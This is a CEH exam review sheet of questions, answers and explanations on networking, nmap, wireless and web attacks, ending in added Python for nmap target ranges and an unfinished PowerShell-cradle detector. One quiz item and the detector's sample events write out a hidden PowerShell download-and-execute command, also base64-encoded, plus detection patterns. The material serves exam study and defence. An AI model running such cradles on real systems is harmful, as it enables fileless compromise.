CEH TEST QUESTIONS TO REVIEW A


Which of the following hashing algorithms results in a 160-bit fixed output? MD-5 SHA-1 NTLM SHA-2

SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Which of the following hashing algorithms results in a 256-bit fixed output? MD-5 SHA-1 NTLM SHA-2

SHA-2

powershell.exe -nop -w hidden

This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden).

You found that sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. Which of the following protocols, which can send data using encryption and digital certificates, will help solve this problem? a. IP b. FTPS c. FTP d. HTTPS

b. FTPS https://en.wikipedia.org/wiki/FTPS FTPS (also known as FTP-SSL and FTP Secure) is an extension to the commonly used File Transfer Protocol (FTP) that adds support for the Transport Layer Security (TLS) and, formerly, the Secure Sockets Layer (SSL, now prohibited by RFC 7568) cryptographic protocols. FTPS includes full support for the TLS and SSL cryptographic protocols, including the use of server-side public key authentication certificates and client-side authorization certificates. It also supports compatible ciphers, including AES, RC4, RC2, Triple DES, and DES. It further supports the hash functions SHA, MD5, MD4, and MD2.

You simulate an attack on your organization's network resources and target the NetBIOS service. You decided to use the NetBIOS API for this attack and perform an enumeration. After finishing, you found that port 139 was open, and you could see the resources that could be accessed or viewed on a remote system. Also, you came across many NetBIOS codes during enumeration. Which of the following NetBIOS codes is used for obtaining the messenger service running for the logged-in user? a. <20> b. <00> c. <03> d. <1B>

c. <03> https://en.wikipedia.org/wiki/NetBIOS NetBIOS is a protocol used for File and Print Sharing under all current versions of Windows. While this in itself is not a problem, the way that the protocol is implemented can be. There are a number of vulnerabilities associated with leaving this port open.
NetBIOS services:
· NetBIOS Name Service (TCP/UDP: 137)
· NetBIOS Datagram Service (TCP/UDP: 138)
· NetBIOS Session Service (TCP/UDP: 139)
The NetBIOS Suffix, alternately called the NetBIOS End Character (endchar), is the 16th character of a NetBIOS name and indicates the service type for the registered name. The number of record types is limited to 255; some commonly used values are:
For unique names:
· 00: Workstation Service (workstation name)
· 03: Windows Messenger service
· 06: Remote Access Service
· 20: File Service (also called Host Record)
· 21: Remote Access Service client
· 1B: Domain Master Browser - Primary Domain Controller for a domain
· 1D: Master Browser
For group names:
· 00: Workstation Service (workgroup/domain name)
· 1C: Domain Controllers for a domain (group record with up to 25 IP addresses)
· 1E: Browser Service Elections

Which of the following is a file on a web server that can be misconfigured and provide sensitive information for a hacker, such as verbose error messages? a. administration.config b. idq.dll c. httpd.conf d. php.ini

d. php.ini *keyword is verbose error message https://blog.securityinnovation.com/blog/2013/10/php-security-configuring-the-phpini-file-properly.html If the php.ini file is exposed inside the 'cgi-bin' directory, any unauthenticated, remote user can discover sensitive information about your server(s), including database logins and passwords and verbose error messages.

Side-Channel Attack

https://en.wikipedia.org/wiki/Side-channel_attack A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such as differential power analysis are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. through HTTPS or WiFi encryption), according to researchers from Microsoft Research and Indiana University.

A system administrator wants to verify that external IP addresses cannot collect software versioning from servers on the network. Which of the following should the system administrator do to confirm the network is protected? A. Analyze packet captures B. Utilize netstat to locate active connections C. Use nmap to query known ports D. Review the ID3 logs on the network

A. Analyze packet captures Captured packets show you the information that was actually traveling over the network. Packet sniffers detail the data they have received, so working through those captures shows whether software versions are visible to, or disclosed to, the external network.

You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

A. Fragmentation attack A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up cracking the WEP password; otherwise, it might take a while to receive enough packets to get the repeated IV. In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.

What encryption does WPA2 use?

AES (Advanced Encryption Standard)

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network? A. Manually review the syslog server's logs B. Conduct an OS fingerprinting scan across the network C. Conduct a packet capture of data traversing the server network D. Conduct a service discovery scan on the network

B. Conduct an OS fingerprinting scan across the network By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually reviewing the syslog server's logs would take too long, and would not find servers that don't send their logs to the syslog server. Conducting a packet capture would only allow you to find the servers actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not effectively identify which servers are running which operating systems. For example, if you see that the Apache web service is running on port 80, it doesn't indicate whether Linux or Windows is the underlying server operating system.

Which of the following focuses on using digitized data as an internal means to reach a physical goal? A. IT systems B. OT systems C. Digital products D. Services

B. OT systems Operational technology (OT) is the application of digital technology for detecting or causing changes in physical devices through monitoring and/or control. OT differs from IT in that it uses digitized data as an internal means to a physical goal, rather than to make information available to users. OT refers to physical devices (for instance, valves and pumps in machinery) that use digitized data to take physical action. OT devices can be as small as the engine control module (ECM) of a car or as large as the distributed control network of a national electricity grid. The collective term 'industrial control systems' (ICSs) refers to OT systems such as supervisory control and data acquisition (SCADA) systems, distributed control systems (DCSs), remote terminal units (RTUs), and programmable logic controllers (PLCs), along with dedicated networks and organization units. The Internet of Things (IoT) supports OT devices, allowing them to connect both to each other and to information systems.

Ivan, the evil hacker, decided to attack the cloud services of the target organization. First of all, he decided to infiltrate the target's MSP provider by sending phishing emails that distributed specially created malware. This program compromised users' credentials, and Ivan managed to gain remote access to the cloud service. Further, he accessed the target customer profiles with his MSP account, compressed the customer data, and stored them in the MSP. After this, he used this information to launch further attacks on the target organization. Which of the following cloud attacks did Ivan perform? A. Cloud cryptojacking B. Cloudborne attack C. Cloud hopper attack D. Man-in-the-cloud (MITC) attack

C. Cloud hopper attack Keyword is MSP provider Operation Cloud Hopper was an extensive attack and theft of information in 2017 directed at MSPs in the United Kingdom (U.K.), United States (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa, India, Thailand, South Korea and Australia. The group used MSPs as intermediaries to acquire assets and trade secrets from MSP clients in engineering, industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies. Operation Cloud Hopper used over 70 variants of backdoors, malware and trojans. These were delivered through spear-phishing emails that targeted APT10's MSPs of interest, posing as a legitimate organization like a public sector agency. The attacks scheduled tasks or leveraged services/utilities to persist in Microsoft Windows systems even if the computer system was rebooted, and installed malware and hacking tools to access systems and steal data. To maintain their foothold on the infected system, the group employed tools that stole legitimate credentials (with administrator privileges) used to access the MSP and its clients' shared systems/infrastructure. This is also what the group uses to move laterally and gain further access to the MSP's clients' networks. APT10 didn't just infect high-value systems. It also installed malware on non-mission-critical machines, which it would then use to move laterally into their targeted computers, a subterfuge to avoid rousing suspicion from the organization's IT/system administrators. APT10 is noted to use open-source malware and hacking tools, which they've customized for their operations, and to furtively access the systems via Remote Desktop Protocol or use RATs to single out which data to steal. The pilfered data are then collated, compressed, and exfiltrated from the MSP's network to the infrastructure controlled by the attackers.

Identify the vulnerability in OpenSSL that allows stealing information that, under normal conditions, is protected by the SSL/TLS encryption used to secure the Internet. A. SSL/TLS Renegotiation Vulnerability B. Shellshock C. Heartbleed Bug D. POODLE

C. Heartbleed Bug Keyword is OpenSSL Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed.
Incorrect answers:
SSL/TLS Renegotiation Vulnerability The vulnerability is with the renegotiation feature, which allows one part of an encrypted connection (the one taking place before renegotiation) to be controlled by one party and the other part (the one taking place after renegotiation) to be controlled by another. A MITM attacker can open a connection to an SSL server, send some data, request renegotiation, and, from that point on, continue to forward to the SSL server the data coming from a genuine user. One could argue that this is not a fault in the protocols, but it is certainly a severe usability issue. The protocols do not ensure continuity before and after negotiation. To make things worse, web servers will combine the data they receive prior to renegotiation (which is coming from an attacker) with the data they receive after renegotiation (which is coming from a victim). This issue is the one affecting the majority of SSL users.
Shellshock https://en.wikipedia.org/wiki/Shellshock_(software_bug) Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.
POODLE https://en.wikipedia.org/wiki/POODLE The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryption") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014"). On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

Which of the following encryption types was used by WPA to better secure wireless networks than WEP? A. CCMP B. AES C. TKIP D. IV

C. TKIP Wi-Fi Protected Access (WPA) fixes most of the security problems with WEP. WPA still uses the RC4 cipher but adds a mechanism called Temporal Key Integrity Protocol (TKIP) to fix the issues with key generation.

What nmap switch would you use to determine which UDP ports are open on a targeted network? A. -sN B. -sP C. -sS D. -sU

D. -sU In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using a SYN scan (stealth scan). The -sP flag is a legacy (and deprecated) option for a ping scan. The -sN flag is used to conduct a TCP NULL scan.

A penetration tester is conducting an assessment of a wireless network that is secured using WPA2 Enterprise encryption. Which of the following are major differences between conducting reconnaissance of a wireless network versus a wired network? (SELECT TWO) 1. Encryption 2. Network access control 3. Port security 4. Authentication 5. Physical accessibility 6. MAC filtering

1. Encryption and 5. Physical Accessibility Most wireless networks utilize end-to-end encryption, whereas wired networks do not. Physical accessibility is another major difference between wireless and wired networks since wireless networks can be accessed from a distance using powerful antennas. Authentication, MAC filtering, and network access control (NAC) can be implemented equally on wired and wireless networks. Port security is only applicable to wired networks.

You must discover all the active devices hidden by a restrictive firewall in the IPv4 range in a target network. Which of the following host discovery techniques will you use? A. ARP ping scan B. UDP scan C. ACK flag probe scan D. TCP Maimon scan

A. ARP Ping Scan keyword is TARGET NETWORK. Address Resolution Protocol (ARP) is used by hosts on a network to resolve IP addresses into Media Access Control (MAC) addresses, which can be interpreted as a network interface's unique serial number. Hosts on an Ethernet network use MAC addresses rather than IP addresses to communicate. When a host tries to create a connection to another host (on the same subnet), it first needs to obtain the second host's MAC address. In this process, Host A sends an ARP request to the broadcast address of the subnet to which it is connected. Every host on the subnet receives this broadcast, and the host with the IP address in question sends an ARP reply back to Host A with its MAC address. After receiving the ARP reply from Host B, Host A can connect to Host B. ARP is required for an Ethernet network to function properly, so it typically is not blocked by a firewall. If ARP requests were blocked, no host would be able to "find" a computer on a network and connect to it. For all intents and purposes, the system would be unplugged from the network. Thus, by sending an ARP request, you are virtually guaranteed to get a reply. One possible drawback to this system of using ARP to ping a host is that ARP is not a routed protocol. If you are not on the same subnet as the host you are trying to connect to, then this method is not going to work without first joining that subnet, which may or may not be physically possible.

A disgruntled employee executes a man-in-the-middle attack on the company network. Layer 2 traffic destined for the gateway is redirected to the employee's computer. What type of attack is this an example of? A. ARP cache poisoning B. IP spoofing C. Amplified DNS attack D. Evil twin

A. ARP cache poisoning Keyword here is Layer 2. ARP works with MAC addresses, which operate on Layer 2 of the OSI model. ARP poisoning reroutes data and allows an attacker to intercept packets of data intended for another recipient. ARP attacks can be sent from any host on the local area network, and the goal is to associate the attacker's MAC address with the IP address of another host so that any traffic meant for that host will instead go directly to the attacker's PC.

Which of the following layers in IoT architecture helps bridge the gap between two endpoints, such as a device and a client, and carries out message routing, message identification, and subscribing? A. Access Gateway. B. Edge Technology. C. Middleware. D. Internet.

A. Access Gateway. The first layer of the Internet of Things consists of sensor-connected IoT devices: These are the small, memory-constrained, often battery-operated electronic devices with onboard sensors and actuators. These could either function as standalone sensing devices or be embedded as part of a bigger machine for sensing and control. Three main capabilities of a typical IoT device are:
· being able to sense and record data
· being able to perform light computing
· being able to connect to a network and communicate the data
Examples of these include fitness trackers, agricultural soil moisture sensors, medical sensors for measuring blood glucose levels and more. There are a huge number of startups and established companies competing to come up with newer and newer sensors, actuators and devices. The second layer consists of IoT gateway devices: The various IoT devices of layer 1 need to be connected to the internet via a more powerful computing device called the IoT gateway, which primarily acts like a networking device. So, similar to how a WiFi router helps us connect many laptops, phones and tablets to the internet at home, the IoT gateway aggregates data from numerous sensing devices and relays it to the cloud. These gateways are critical components of the IoT ecosystem. Typically, IoT gateways are equipped with multiple communication capabilities (like Bluetooth, Zigbee, LoRaWAN, Sub-GHz proprietary protocols) to talk to the IoT devices on one end and a connection to the IP (Internet) based network on the other side (over WiFi, Ethernet or a cellular link). The third layer of IoT is the Cloud: All the sensor data relayed by IoT gateways is stored on cloud-hosted servers. These servers accept, store and process data for analysis and decision making. This layer also enables the creation of live dashboards which decision makers can monitor to take proactive, data-driven decisions. Today, almost all cloud computing companies have custom service offerings for IoT solutions. The fourth layer is IoT Analytics: This is where the magic happens and the collected raw data is converted into actionable business insights, which can help improve business operations and efficiency or even predict future events like machine failure. This layer employs different data science and analytics techniques, including machine learning algorithms, to make sense of the data and enable corrective action.

After issuing the command "telnet diontraining.com 80" and connecting to the server, what command conducts the banner grab? A. HEAD / HTTP/1.1 B. PUT / HTTP/1.1 C. HEAD / HTTP/2.0 D. PUT / HTTP/2.0

A. HEAD / HTTP/1.1 To conduct a banner grab using telnet, you first must connect to the server using "telnet webserver 80". Once the connection is established, you will receive a blank prompt, and you then issue the command "HEAD / HTTP/1.1". It requests the document header from the server and provides information such as the server software version and the server's operating system.

If you cannot ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to elicit a response from a host using TCP, what tool would you use? A. Hping B. Traceroute C. Ptunnel D. Broadcast ping

A. Hping Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. Hping also allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the Nmap creators have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring packets' transit delays across an Internet Protocol network. Traceroute uses ICMP and not TCP. Broadcast ping is simply pinging the subnet's broadcast IP using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. Ptunnel is used as a covert channel, not to elicit a response from a host using TCP.

Your company is adopting a cloud-first architecture model. Management wants to decommission the on-premises SIEM your analysts use and migrate it to the cloud. Which of the following is an issue with using this approach? A. Legal and regulatory issues may prevent data migration to the cloud B. A VM escape exploit could allow an attacker to gain access to the SIEM C. The company will be dependent on the cloud provider's backup capabilities D. The company will have less control over the SIEM

A. Legal and regulatory issues may prevent data migration to the cloud If there are legal or regulatory requirements that require the company to host their security audit data on-premises, then moving to the cloud will not be possible without violating applicable laws. For example, some companies must host their data within their national borders, even when migrating to the cloud. The other options presented are all low risk and can be overcome with proper planning and mitigations. Most cloud providers have degrees of redundancy far above what any individual on-premises operator will be able to generate, making the concern over backups a minimal risk. If the SIEM is moved to a cloud-based server, it could still be operated and controlled in the same manner as the previous on-premises solution using a virtualized cloud-based server. While a VM or hypervisor escape is possible, they are rare and can be mitigated with additional controls.

Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment? A. NIST B. OWASP C. SDLC D. SANS

A. NIST (National Institute of Standards and Technology) *keyword is the BEST, which would be NIST. OWASP does have a framework, but it is a community-based one. NIST produced a useful patch and vulnerability management program framework in its Special Publication NIST SP 800-40. It would be useful during the program's establishment and provides a series of guidelines and best practices. Wrong answers: SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). SDLC is a software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? A. SQL injection B. Cross-site scripting C. Buffer overflow D. Denial of service

A. SQL injection A SQL injection poses the most direct and most impactful threat to an organization's database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn't intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow other malicious code to run. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.

The Web development team is holding an urgent meeting, as they have received information from testers about a new vulnerability in their Web software. They make an urgent decision to reduce the likelihood of the vulnerability being exploited. The team decides to modify the software requirements to disallow users from entering HTML as input into their Web application. Determine the type of vulnerability that the test team found. A. SQL injection vulnerability. B. Cross-site Request Forgery vulnerability. C. Website defacement vulnerability. D. Cross-site scripting vulnerability.

D. Cross-site scripting vulnerability There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. In this case, we consider the non-persistent cross-site scripting vulnerability. The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.

Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT? A. Network traffic analysis B. Network forensics C. Endpoint behavior analysis D. Endpoint forensics

D. Endpoint forensics An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.

You are planning an engagement with a new client. Which target type should be selected to simulate an APT? A. Internal B. On-site C. Third-party hosted D. External

D. External An advanced persistent threat (APT) is a threat that uses multiple attack vectors to gain unauthorized access to sensitive resources. APTs are often funded by nation-states and used for intelligence-gathering operations against government, military, and commercial networks. In general, an APT attacks from outside the organization, so it is simulated using the external target type.

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? A. netcat B. telnet C. wget D. ftp

D. FTP FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

You have detected an abnormally large amount of traffic coming from local computers at night. You decide to find out the reason, do a few checks and find that an attacker has exfiltrated user data. Also, you noticed that AV tools could not find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. Which of the following type of malware did the attacker use to bypass your company's application whitelisting? A. Logic bomb malware B. Zero-day malware C. Phishing malware D. Fileless malware

D. Fileless Malware

All the industrial control systems of your organization are connected to the Internet. Your management wants to empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption. You have been assigned to find and install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools will you use to accomplish this task? A. Robotium B. BalenaCloud C. IntentFuzzer D. Flowmon

D. Flowmon According to EC-Council's study guide: "Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks to avoid downtime and disruption of service continuity"

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing an operating system SCAP plugin B. Utilizing an authorized credential scan C. Utilizing a non-credential scan D. Utilizing a known malware plugin

A. Utilizing an operating system SCAP plugin *Keyword is industry standard. Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry standard and supports testing for compliance against published benchmarks. The other options will not allow for a truly repeatable process, since individual scans would occur each time instead of comparing against a known good baseline.

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? A. Web application vulnerability scan B. Database vulnerability scan C. Port scan D. Network vulnerability scan

A. Web application vulnerability scan Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.

Session splicing is an IDS evasion technique that exploits how some IDSs do not reconstruct sessions before performing pattern matching on the data. The idea behind session splicing is to split data between several packets, ensuring that no single packet matches any patterns within an IDS signature. Which tool can be used to perform session splicing attacks? A. Whisker B. Burp C. Hydra D. tcpsplice

A. Whisker

Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A. nmap -Pn 10.0.0-3.0 B. nmap -Pn 10.0.0.0/23 C. nmap -Pn 10.0.0.0,1.0,2.0,3.0 D. nmap -Pn 10.0.0.0/25

A. nmap -Pn 10.0.0-3.0 The simplest way to scan several adjacent subnets in one command is nmap's octet-range syntax. -Pn tells nmap to skip host discovery (no ping) and scan every address in the target space as if it were up. A dash inside an octet means "this value through this value", so 10.0.0-3 covers third-octet values 0, 1, 2 and 3. One caveat a practitioner should know: nmap expands each octet independently, so 10.0.0-3.0 as written expands to only four addresses (10.0.0.0, 10.0.1.0, 10.0.2.0 and 10.0.3.0). To cover every host from 10.0.0.0 through 10.0.3.255 you would write 10.0.0-3.0-255, 10.0.0-3.*, or the equivalent CIDR block 10.0.0.0/22. The other options do not cover the four subnets: 10.0.0.0/23 is only 10.0.0.0 through 10.0.1.255, 10.0.0.0/25 is only 128 addresses, and 10.0.0.0,1.0,2.0,3.0 is not valid nmap target syntax (commas are allowed within a single octet, not across octets).
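
To make the difference between an octet range and a CIDR block concrete, here is an added Python model of nmap's IPv4 target-specification syntax. It is written for this page and is not code from the nmap project; it covers per-octet values, ranges, comma lists, wildcards and CIDR, which is a simplification of nmap's full parser and an assumption about its behaviour for the forms shown here.

```python
import ipaddress
from itertools import product


def _expand_octet(spec):
    """Expand one octet of an nmap-style target: '3', '0-3', '-', '*', '1,3-5'."""
    values = set()
    for part in spec.split(","):
        if part in ("*", "-"):            # wildcard: every value 0..255
            values.update(range(256))
        elif "-" in part:                 # range; an empty side means 0 or 255
            lo, hi = part.split("-", 1)
            values.update(range(int(lo) if lo else 0, (int(hi) if hi else 255) + 1))
        else:
            values.add(int(part))
    if any(v < 0 or v > 255 for v in values):
        raise ValueError(f"octet out of range: {spec!r}")
    return sorted(values)


def expand_target(spec):
    """Return every IPv4 address a single nmap target spec covers.

    Dotted-octet specs are expanded octet by octet and combined with a
    Cartesian product (this is why 10.0.0-3.0 yields only four addresses);
    CIDR specs cover the whole block, network and broadcast addresses included.
    """
    if "/" in spec:
        return [str(ip) for ip in ipaddress.ip_network(spec, strict=False)]
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"not a dotted-quad target: {spec!r}")
    return [".".join(str(o) for o in combo)
            for combo in product(*(_expand_octet(o) for o in octets))]


def count_targets(spec):
    return len(expand_target(spec))


def is_valid_target(spec):
    """True if the spec parses under the rules above (used to check option C)."""
    try:
        expand_target(spec)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for spec in ("10.0.0-3.0", "10.0.0-3.0-255", "10.0.0-3.*",
                 "10.0.0.0/22", "10.0.0.0/23", "10.0.0.0/25"):
        print(f"{spec:18} -> {count_targets(spec):5d} addresses")
    print("10.0.0.0,1.0,2.0,3.0 valid?", is_valid_target("10.0.0.0,1.0,2.0,3.0"))
```

Running it shows 10.0.0-3.0 producing 4 addresses while 10.0.0-3.0-255, 10.0.0-3.* and 10.0.0.0/22 each produce 1024, which is the check to do before trusting a range expression in a real scan.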

You must identify open ports in the target network, determine whether the hosts are online, and note any firewall rule sets encountered along the way. Which of the following nmap commands must you use to perform the TCP SYN ping scan? A. nmap -sn -PS < target IP address > B. nmap -sn -PO < target IP address > C. nmap -sn -PA < target IP address > D. nmap -sn -PP < target IP address >

A. nmap -sn -PS < target IP address > -PS<port list> is the TCP SYN ping: nmap sends an empty TCP packet with the SYN flag set (to port 80 by default) and treats either a SYN/ACK or a RST reply as proof that the host is up; no reply at all usually means a filtering device dropped the probe. -sn disables the port scan so that only host discovery runs. The other options are different discovery probes: -PA<port list> is the TCP ACK ping, -PO<protocol list> is the IP protocol ping, and -PE, -PP and -PM are the ICMP echo, timestamp and netmask ping types.

You make a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions. What type of attack are you trying to perform? A. Chosen-plaintext attack B. Adaptive chosen-plaintext attack C. Ciphertext-only attack D. Known-plaintext attack

B. Adaptive chosen-plaintext attack An adaptive chosen-plaintext attack is a chosen-plaintext attack scenario in which the attacker chooses the inputs to the encryption function based on the previous chosen-plaintext queries and their corresponding ciphertexts. The scenario is clearly more powerful than the basic chosen-plaintext attack but is probably less practical in real life, since it requires interactive access to the encryption device.

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks

B. Banner grabbing This falls under active reconnaissance.

A penetration tester issued the following command on a victimized Windows system: c:\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://diontraining.com/updates') Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct? A. Scheduling a task for persistence B. Download and execute a remote script C. Conduct DLL hijacking D. Exploiting an unquoted service paths

B. Download and execute a remote script This command launches PowerShell without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). What powershell.exe runs is given after -c, which executes a command or script block and then exits. Invoke-Expression (IEX) evaluates whatever string it is handed as PowerShell code; here that string is the body returned by (new-object net.webclient).downloadstring(...), so whatever the remote URL serves is executed in memory without a file ever being written to disk. This "download cradle" is a common first stage for fileless malware, and the command line itself is usually the only artifact left for defenders.
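
As an added example (written for this page, not taken from any product or from the quiz), the following Python detection logic runs over a few constructed process-creation records shaped like Sysmon Event ID 1 fields and flags the download cradle above, including an -EncodedCommand variant that hides the same cradle as base64-encoded UTF-16LE. It also illustrates why the fileless malware question earlier on this page points at command-line telemetry rather than antivirus file scanning. The sample records, field names and URL are constructed.

```python
import base64
import re

# Constructed sample process-creation records (Sysmon-style fields; not real telemetry).
_ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (new-object net.webclient)"
                ".downloadstring('http://example.invalid/updates')"},
    {"pid": 5001, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 5330, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc " + _ENCODED_CRADLE},
    {"pid": 6100, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process | Sort-Object CPU"},
]

# A cradle needs a way to fetch code and a way to evaluate it.
CRADLE_PATTERNS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"Net\.WebClient", r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod",
]
# Flags that keep the execution quiet; PowerShell accepts unambiguous prefixes (-nop, -w, -enc).
STEALTH_FLAGS = {
    "no-profile": r"-(?:nop|noprofile)\b",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden\b",
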